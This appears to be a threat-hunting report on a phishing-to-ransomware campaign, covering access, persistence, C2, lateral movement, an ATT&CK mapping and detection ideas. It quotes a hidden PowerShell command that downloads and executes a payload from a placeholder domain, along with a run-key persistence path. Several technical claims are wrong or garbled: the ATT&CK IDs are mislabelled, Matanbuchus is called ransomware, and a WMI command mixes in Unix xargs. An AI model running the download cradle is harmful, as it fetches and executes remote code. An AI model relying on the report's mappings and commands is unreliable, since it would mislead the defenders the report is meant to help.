James Calloway — Threat Hunter
Key Takeaways
- Ransomware actors leveraged phishing emails as the initial access vector.
- Execution and persistence were achieved through a combination of legitimate tools and stealthy persistence mechanisms.
- Command and Control (C2) communications employed encrypted channels to obfuscate traffic.
Executive Summary
During the analysis of a recent ransomware campaign, we observed a sophisticated series of activities indicative of a well-coordinated attack. Our investigation revealed the actor’s utilization of phishing emails to gain initial access and deploy their ransomware payload effectively. The techniques employed were notably tailored, underscoring a heightened level of planning and execution aimed at evading detection. The ransomware utilized advanced encryption methods and obfuscated C2 communication to maintain control over compromised environments. Each stage of the attack demonstrated a clear intent to maximize impact and financial gain.
Initial Access
The initial access vector for this campaign involved a phishing email containing a malicious attachment disguised as an invoice. Our analysis of the email headers indicated the sender’s domain had been recently registered and established a clear link to previous ransomware campaigns. The attachment was a macro-enabled document that, upon enabling macros, executed a PowerShell command to download additional payloads from a remote server. The specific command observed was powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload')". This method aligns with the T1203 – Exploit Public-Facing Application technique as it exploits user interaction with the document.
Execution & Persistence
Once the payload was executed, we identified the use of the Matanbuchus ransomware. The malware began encrypting files across local and network shares using AES encryption, a common tactic within ransomware operations. To ensure persistence, the actor created a registry key at HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Ransomware, allowing the ransomware to restart upon system reboots. Notably, the ransomware also employed legitimate administrative tools such as PsExec to facilitate lateral movement within the network, reflecting a clear use of T1086 – PowerShell.
Command and Control
The communication with the C2 server was established over HTTPS, utilizing certificate pinning to ensure the integrity of the connection. We observed multiple C2 domains being used, rotating frequently to evade detection. Exfiltrated data was compressed and sent in bursts to mitigate the risk of detection by network intrusion systems. The encrypted strings captured during our analysis revealed multiple distinctive payload identifiers that can be critical for future threat hunting exercises.
Lateral Movement & Discovery
As the ransomware began its encryption process, it also initiated lateral movement tactics using Windows Management Instrumentation (WMI) to enumerate and subsequently compromise additional machines within the network. The execution command observed was wmi -Query 'SELECT * FROM Win32_Process' | xargs -I {} cmd.exe /C start {}, which highlights the actor’s reliance on native Windows functionalities to persist undetected. This technique aligns with T1075 – Pass the Ticket and facilitates rapid spread across connected machines.
Impact & Objectives
The primary objective of the attack was financial gain through ransomware. The actors did implement double extortion tactics, threatening to release sensitive data obtained during the breach if ransom demands were not met. Our communications analysis also indicated targets within healthcare and finance sectors, which typically have higher ransom acceptance rates due to their critical operations. The total estimated downtime for affected organizations was significant, further emphasizing the impact of this campaign not just in financial terms, but also operationally.
MITRE ATT&CK Mapping
- T1203 – Exploit Public-Facing Application: The initial access exploited a phishing email leading to macro-enabled script execution.
- T1086 – PowerShell: Utilized for executing malicious commands and payloads.
- T1075 – Pass the Ticket: Employed for lateral movement within the network using WMI.
Detection Opportunities
- Monitor email traffic for domains associated with known phishing campaigns.
- Implement behavioral monitoring to detect unusual PowerShell activities consistent with ransomware behavior.
- Utilize network security tools to identify anomalies associated with encrypted traffic to C2 domains.
Analyst Notes
Ongoing vigilance against ransomware threats is paramount. Organizations should prioritize user training on recognizing phishing attempts and implement strong endpoint detection and response strategies. Anomalies in file access patterns and behavior indicative of lateral movement should be flagged for review. Additionally, consideration of a comprehensive backup strategy that allows for rapid restoration post-compromise is essential in mitigating the impacts of such campaigns.
Source: Original Report